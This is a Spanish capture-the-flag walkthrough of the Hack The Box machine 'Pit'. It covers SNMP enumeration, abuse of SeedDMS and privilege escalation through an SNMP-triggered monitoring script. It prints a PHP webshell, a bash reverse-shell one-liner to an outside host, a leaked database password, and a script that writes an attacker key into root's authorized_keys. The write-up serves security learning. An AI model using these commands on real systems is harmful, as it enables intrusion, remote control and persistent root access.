Resolución detallada de la maquina Pit. Veremos las siguientes técnicas:
- Information leakage
- SNMP Enumeration
- Abusing SeedDMS
- SNMP Code Execution
Reconocimiento.
Comprobación conexión y TTL.
Realizamos un ping a la maquina victima para comprobar que tenemos traza ICMP y averiguar el S.O mediante el TTL:
1
ping -c 1 10.10.10.241
Tenemos conexión y estamos ante una maquina linux.
Escaneo de puertos.
Utilizaremos nmap para escanear todos los puertos que tiene abiertos la maquina victima:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
┌─[root@h4cknet]─[/home/w0lfst/HTB/Pit]
└──╼ # nmap -p- --open -sS --min-rate 5000 -n -Pn -vvv 10.10.10.241 -oG allPorts
Starting Nmap 7.92 ( https://nmap.org ) at 2022-02-10 21:53 CET
Initiating SYN Stealth Scan at 21:53
Scanning 10.10.10.241 [65535 ports]
Discovered open port 22/tcp on 10.10.10.241
Discovered open port 80/tcp on 10.10.10.241
Discovered open port 9090/tcp on 10.10.10.241
Completed SYN Stealth Scan at 21:54, 26.36s elapsed (65535 total ports)
Nmap scan report for 10.10.10.241
Host is up, received user-set (0.066s latency).
Scanned at 2022-02-10 21:53:41 CET for 26s
Not shown: 65500 filtered tcp ports (no-response), 32 filtered tcp ports (admin-prohibited)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE REASON
22/tcp open ssh syn-ack ttl 63
80/tcp open http syn-ack ttl 63
9090/tcp open zeus-admin syn-ack ttl 63
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 26.47 seconds
Raw packets sent: 131048 (5.766MB) | Rcvd: 35 (2.436KB)
En mis apuntes encontraras mas detalladamente que hace cada parámetro del comando.
Escaneo de servicios que corren cada puerto.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
┌─[root@h4cknet]─[/home/w0lfst/HTB/Pit]
└──╼ #nmap -sCV -p22,80,9090 10.10.10.241 -oN targeted
Starting Nmap 7.92 ( https://nmap.org ) at 2022-02-10 21:55 CET
Nmap scan report for 10.10.10.241
Host is up (0.071s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.0 (protocol 2.0)
| ssh-hostkey:
| 3072 6f:c3:40:8f:69:50:69:5a:57:d7:9c:4e:7b:1b:94:96 (RSA)
| 256 c2:6f:f8:ab:a1:20:83:d1:60:ab:cf:63:2d:c8:65:b7 (ECDSA)
|_ 256 6b:65:6c:a6:92:e5:cc:76:17:5a:2f:9a:e7:50:c3:50 (ED25519)
80/tcp open http nginx 1.14.1
|_http-title: Test Page for the Nginx HTTP Server on Red Hat Enterprise Linux
|_http-server-header: nginx/1.14.1
9090/tcp open ssl/zeus-admin?
| fingerprint-strings:
| GetRequest, HTTPOptions:
| HTTP/1.1 400 Bad request
| Content-Type: text/html; charset=utf8
| Transfer-Encoding: chunked
| X-DNS-Prefetch-Control: off
| Referrer-Policy: no-referrer
| X-Content-Type-Options: nosniff
| Cross-Origin-Resource-Policy: same-origin
| <!DOCTYPE html>
| <html>
| <head>
| <title>
| request
| </title>
| <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
| <meta name="viewport" content="width=device-width, initial-scale=1.0">
| <style>
| body {
| margin: 0;
| font-family: "RedHatDisplay", "Open Sans", Helvetica, Arial, sans-serif;
| font-size: 12px;
| line-height: 1.66666667;
| color: #333333;
| background-color: #f5f5f5;
| border: 0;
| vertical-align: middle;
| font-weight: 300;
|_ margin: 0 0 10p
| ssl-cert: Subject: commonName=dms-pit.htb/organizationName=4cd9329523184b0ea52ba0d20a1a6f92/countryName=US
| Subject Alternative Name: DNS:dms-pit.htb, DNS:localhost, IP Address:127.0.0.1
| Not valid before: 2020-04-16T23:29:12
|_Not valid after: 2030-06-04T16:09:12
|_ssl-date: TLS randomness does not represent time
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
| Puerto | Servicio | Version |
|---|---|---|
| 22 | ssh | OpenSSH 8.0 |
| 80 | http | nginx 1.14.1 |
| 9090 | ssl/zeus-admin? | - |
El escaneo nos reporta un dominio dms-pit.htb:
1
ssl-cert: Subject: commonName=dms-pit.htb/
Examinando certificado ssl.
Vamos a examinar el certificado https que tiene el puerto 9090:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
┌─[root@h4cknet]─[/home/w0lfst/HTB/Pit]
└──╼ #openssl s_client -connect 10.10.10.241:9090
CONNECTED(00000003)
Can't use SSL_get_servername
depth=0 C = US, O = 4cd9329523184b0ea52ba0d20a1a6f92, CN = dms-pit.htb
verify error:num=20:unable to get local issuer certificate
verify return:1
depth=0 C = US, O = 4cd9329523184b0ea52ba0d20a1a6f92, CN = dms-pit.htb
verify error:num=21:unable to verify the first certificate
verify return:1
depth=0 C = US, O = 4cd9329523184b0ea52ba0d20a1a6f92, CN = dms-pit.htb
verify return:1
---
Certificate chain
0 s:C = US, O = 4cd9329523184b0ea52ba0d20a1a6f92, CN = dms-pit.htb
i:C = US, O = 4cd9329523184b0ea52ba0d20a1a6f92, OU = ca-5763051739999573755, CN = dms-pit.htb
---
Server certificate
-----BEGIN CERTIFICATE-----
MIIEpjCCAo6gAwIBAgIISl2h4yex5dEwDQYJKoZIhvcNAQELBQAwbzELMAkGA1UE
BhMCVVMxKTAnBgNVBAoMIDRjZDkzMjk1MjMxODRiMGVhNTJiYTBkMjBhMWE2Zjky
MR8wHQYDVQQLDBZjYS01NzYzMDUxNzM5OTk5NTczNzU1MRQwEgYDVQQDDAtkbXMt
cGl0Lmh0YjAeFw0yMDA0MTYyMzI5MTJaFw0zMDA2MDQxNjA5MTJaME4xCzAJBgNV
BAYTAlVTMSkwJwYDVQQKDCA0Y2Q5MzI5NTIzMTg0YjBlYTUyYmEwZDIwYTFhNmY5
MjEUMBIGA1UEAwwLZG1zLXBpdC5odGIwggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAw
ggEKAoIBAQDZLaNRUf3BXYCd+Df9XZwMBmIwGzy/yX+9fPY6zGXYEYS7SeH9xZ7p
GTUQMfk30Olb7rzftCKx9xSMHyoCJIAWFeVDV9vxJbGaEqFRvKHPeqcpQbRAKoqL
xWaqbDZCXsBtTVYEwpRHvJ/GoGEWAQSbP1zkHzvVBkHuXE7Sj0zlW5NaBjvG/wEe
wAB6crwnIYoqC550cMPritvjLwijk9nhwaPJ462anhJR5vFBvkR4nqD3mhIytUOb
YMsfVoI0FiXtlBdu1ApABxtIdQgkY94eRAaMTkQ4Je0a8G5PlRZ20xCdqHb3xIZV
1mphZehkUeN0MzgEloL5TX8Zab+LZW+ZAgMBAAGjZzBlMA4GA1UdDwEB/wQEAwIF
oDAJBgNVHRMEAjAAMCcGA1UdEQQgMB6CC2Rtcy1waXQuaHRigglsb2NhbGhvc3SH
BH8AAAEwHwYDVR0jBBgwFoAUc8ssOet8O2a3+F2If4eQixSV7PwwDQYJKoZIhvcN
AQELBQADggIBAG8kou51q78wdzxiPejMv9qhWlBWW3Ly5TvAav07ATx8haldEHvT
LlFNGPDFAvJvcKguiHnGrEL9Im5GDuzi31V4fE5xjzWJdkepXasK7NzIciC0IwgP
7G1j11OUJOt9pmDRu2FkTHsSdr5b57P4uXS8rRF5lLCEafuemk6ORXa07b9xSrhC
3pWl22RtVlTFQ3wX8OsY0O3w5UUz8T/ezhKYUoM/mYQu+ICTAltlX4xae6PGauCh
uaOY+/dPtM17KfHSbnCS1ZnR0oQ4BXJuYNfOR/C59L5B7TWzaOx5n1TD6JHOzrDu
LxjO0OTeFaBRXL/s2Z5zNPTpZVnHyKEmHr5ZObjR6drDGqXfShPq5y70RfE28Pxm
VTCdK4MCqDkELIlXrxzHQ/IPC8pxho6WEQsY80xZ1nXbLshlymh6clgblOetToZT
HObIkEoPBtszUssFmWSN5hd4JcuyqSbJhichYtFQRASb2I4jWdP831LPir+MCGQv
iAnieBF8zYus7kboTwfXmBGUt6r6eNE1yr4ZXPxOZoWq2ob6aAeLp2mqif+jgUSk
fiG9oiAoyXWxw5pLfYHxVQGY+rGbjOs8gCAxBaTPt6dCkHZy/nU8PNZtV6QC4OME
LI/sYtmG8XENdQhsLM2sewOMvv5rgsZ8SlX05Bw8C1xuq5Rg1KewCjlY
-----END CERTIFICATE-----
subject=C = US, O = 4cd9329523184b0ea52ba0d20a1a6f92, CN = dms-pit.htb
issuer=C = US, O = 4cd9329523184b0ea52ba0d20a1a6f92, OU = ca-5763051739999573755, CN = dms-pit.htb
---
No client certificate CA names sent
Peer signing digest: SHA256
Peer signature type: RSA-PSS
Server Temp Key: X25519, 253 bits
---
SSL handshake has read 1750 bytes and written 363 bytes
Verification error: unable to verify the first certificate
---
New, TLSv1.3, Cipher is TLS_AES_256_GCM_SHA384
Server public key is 2048 bit
Secure Renegotiation IS NOT supported
Compression: NONE
Expansion: NONE
No ALPN negotiated
Early data was not sent
Verify return code: 21 (unable to verify the first certificate)
---
closed
Aquí también podemos ver el dominio dms-pit.htb.
Vamos a añadirlo al /etc/hosts y ponemos en el navegador el dominio. El resultado es 403 forbidden.
Escaneando puertos UDP.
Analizando los subdirectorios no encontramos nada. Asi que vamos a analizar los puertos udp:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
┌─[root@h4cknet]─[/home/w0lfst/HTB/Pit]
└──╼ #nmap -sU --top-ports 100 --open -v -n 10.10.10.241 -oG top100udp
Starting Nmap 7.92 ( https://nmap.org ) at 2022-02-10 22:46 CET
Initiating Ping Scan at 22:46
Scanning 10.10.10.241 [4 ports]
Completed Ping Scan at 22:46, 0.17s elapsed (1 total hosts)
Initiating UDP Scan at 22:46
Scanning 10.10.10.241 [100 ports]
Discovered open port 161/udp on 10.10.10.241
UDP Scan Timing: About 46.89% done; ETC: 22:47 (0:00:35 remaining)
Stats: 0:01:06 elapsed; 0 hosts completed (1 up), 1 undergoing UDP Scan
UDP Scan Timing: About 79.67% done; ETC: 22:47 (0:00:17 remaining)
Completed UDP Scan at 22:47, 101.27s elapsed (100 total ports)
Nmap scan report for 10.10.10.241
Host is up (0.081s latency).
Not shown: 99 filtered udp ports (admin-prohibited)
PORT STATE SERVICE
161/udp open snmp
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 101.56 seconds
Raw packets sent: 270 (16.691KB) | Rcvd: 109 (8.942
Nos reporta el puerto SNMP (Protocolo simple de gestión de red.). Esto nos permitirá enumerar información de la maquina.
Aplicando fuerza bruta y snmp.
Utilizaremos un diccionario de SecLists y la herramienta onesixtyone. Con esto vamos a aplicar fuerza bruta sobre el host y detectar community strings validas.
1
2
3
4
5
┌─[✗]─[root@h4cknet]─[/home/w0lfst/HTB/Pit]
└──╼ #onesixtyone -c /usr/share/wordlists/SecLists/Discovery/SNMP/snmp.txt 10.10.10.241
Scanning 1 hosts, 3220 communities
10.10.10.241 [public] Linux pit.htb 4.18.0-305.10.2.el8_4.x86_64 #1 SMP Tue Jul 20 17:25:16 UTC 2021 x86_64
10.10.10.241 [public] Linux pit.htb 4.18.0-305.10.2.el8_4.x86_64 #1 SMP Tue Jul 20 17:25:16 UTC 2021 x86_64
Public es una community string correcta. De forma que ahora podemos utilizar snmpwalk para ver información de la maquina.
Antes de ejecutar snmpwalk vamos a instalarnos snmp-mibs-downloader y modificar /etc/snmp/snmp.conf, comentamos el mibs : con un #, guardamos y ejecutamos snmpbulkwalk:
1
snmpbulkwalk -v2c -c public 10.10.10.241
No encontramos nada interesante. Probaremos a escanear desde la raíz indicando 1 en el OID:
1
snmpbulkwalk -v2c -c public 10.10.10.241 1
Ahora si!!
Analizando todo lo que reporta, vemos lo siguiente:
- Usuario:
michelle - Ruta:
/var/www/html/seeddms51x/seeddms
Vamos a probar la ruta en el dominio https://dms-pit.htb:
Introducimos el usuario michelle y contraseña michelle. Estamos dentro!!
Explotación.
Buscando vulnerabilidad.
Buscamos alguna vulnerabilidad en exploit-db.com. Utilizare la herramienta searchsploit:
1
2
3
4
5
6
7
8
9
10
11
12
┌─[root@h4cknet]─[/home/w0lfst/HTB/Pit/exploits]
└──╼ #searchsploit seeddms
------------------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
Exploit Title | Path
------------------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
Seeddms 5.1.10 - Remote Command Execution (RCE) (Authenticated) | php/webapps/50062.py
SeedDMS 5.1.18 - Persistent Cross-Site Scripting | php/webapps/48324.txt
SeedDMS < 5.1.11 - 'out.GroupMgr.php' Cross-Site Scripting | php/webapps/47024.txt
SeedDMS < 5.1.11 - 'out.UsrMgr.php' Cross-Site Scripting | php/webapps/47023.txt
SeedDMS versions < 5.1.11 - Remote Command Execution | php/webapps/47022.txt
------------------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
Visualizamos el siguiente:
1
searchsploit -x php/webapps/47022.txt
Explotando vulnerabilidad.
Estos son los pasos que nos indica:
1
2
3
4
5
6
7
8
9
10
11
12
Step 1: Login to the application and under any folder add a document.
Step 2: Choose the document as a simple php backdoor file or any backdoor/webshell could be used.
PHP Backdoor Code:
<?php
system($_REQUEST['cmd']);
?>
Step 3: Now after uploading the file check the document id corresponding to the document.
Step 4: Now go to example.com/data/1048576/"document_id"/1.php?cmd=cat+/etc/passwd to get the command response in browser.
Después de seguir los pasos anteriores tendremos ejecución de comandos remotamente, para poder ejecutar los comandos de manera mas cómoda utilizaremos la herramienta ttyovertthp hecha por s4vitar.
Recuerda : Modifica la variable main_url por tu id de documento y nombre del php.
Vemos un archivo de configuración con credenciales en ../../conf/settings.xml/
1
<database dbDriver="mysql" dbHostname="localhost" dbDatabase="seeddms" dbUser="seeddms" dbPass="ied^ieY6xoquu" doNotCheckVersion="false">
Vamos a probar la contraseña ied^ieY6xoquu en el panel http://pit.htb:9090 con el usuario michelle…Estamos dentro!!
Flag de usuario.
Hay un apartado que llama la atención Terminal:
Acceso a la maquina.
Vamos a enviarnos una bash a nuestra maquina. Nos ponemos en escucha por el puerto 443:
1
nc -nvlp 443
Y enviamos la bash:
1
bash -c "bash -i >& /dev/tcp/10.10.16.7/443 0>&1"
Tratamos la tty:
1
2
3
4
5
6
7
8
9
10
[michelle@pit ~]$ script /dev/null -c bash
Script started, output log file is '/dev/null'.
[michelle@pit ~]$ ^Z
[1]+ Stopped nc -nvlp 443
w0lfst@h4cknet:~$ stty raw -echo; fg
nc -nvlp 443
reset xterm
[michelle@pit ~]$ export TERM=xterm
[michelle@pit ~]$ export SHELL=bash
[michelle@pit ~]$ stty rows X colums X
Escalando privilegios.
Anteriormente vimos la ejecución de un script /usr/bin/monitor. Vamos a ver que contiene:
1
2
3
4
5
6
7
[michelle@pit ~]$ cat /usr/bin/monitor
#!/bin/bash
for script in /usr/local/monitoring/check*sh
do
/bin/bash $script
done
El script ejecuta con bash cualquier script que contenga check y termine en .sh. Nos dirigimos a la ruta /usr/local/monitoring pero no tenemos permiso para visualizar el directorio. Vamos a ver que permisos hay asignados a la carpeta:
1
2
3
[michelle@pit local]$ ls -la monitoring
total 0
drwxrwx---+ 2 root root 122 Feb 10 19:15 monitoring
Vemos un + asi que seguramente tenga permisos avanzados:
1
2
3
4
5
6
7
8
9
[michelle@pit local]$ getfacl monitoring/
# file: monitoring/
# owner: root
# group: root
user::rwx
user:michelle:-wx
group::rwx
mask::rwx
other::---
El usuario michelle tiene permisos para escribir
Creando script.
Nos crearemos un script nuevo:
1
vi checkw0lfst.sh
1
2
3
#!/bin/bash
echo 'tu-clave-publica' > /root/.ssh/authorized_keys
Esto copiara nuestra clave publica a las autorizadas del usuario root y conseguiremos acceder por ssh mediante nuestra clave privada sin necesidad de contraseña.
Para forzar la ejecución del comando /usr/local/monitoring tenemos que lanzar lo siguiente en nuestra maquina:
1
snmpwalk -v2c -c public 10.10.10.241 NET-SNMP-EXTEND-MIB::nsExtendObjects
Y realizar la conexión por ssh:
1
ssh root@pit.htb
Visualizamos la flag y listo!!
Exploits y contenido: En mi github encontraras el script autopwn.py y los archivos de reconocimiento.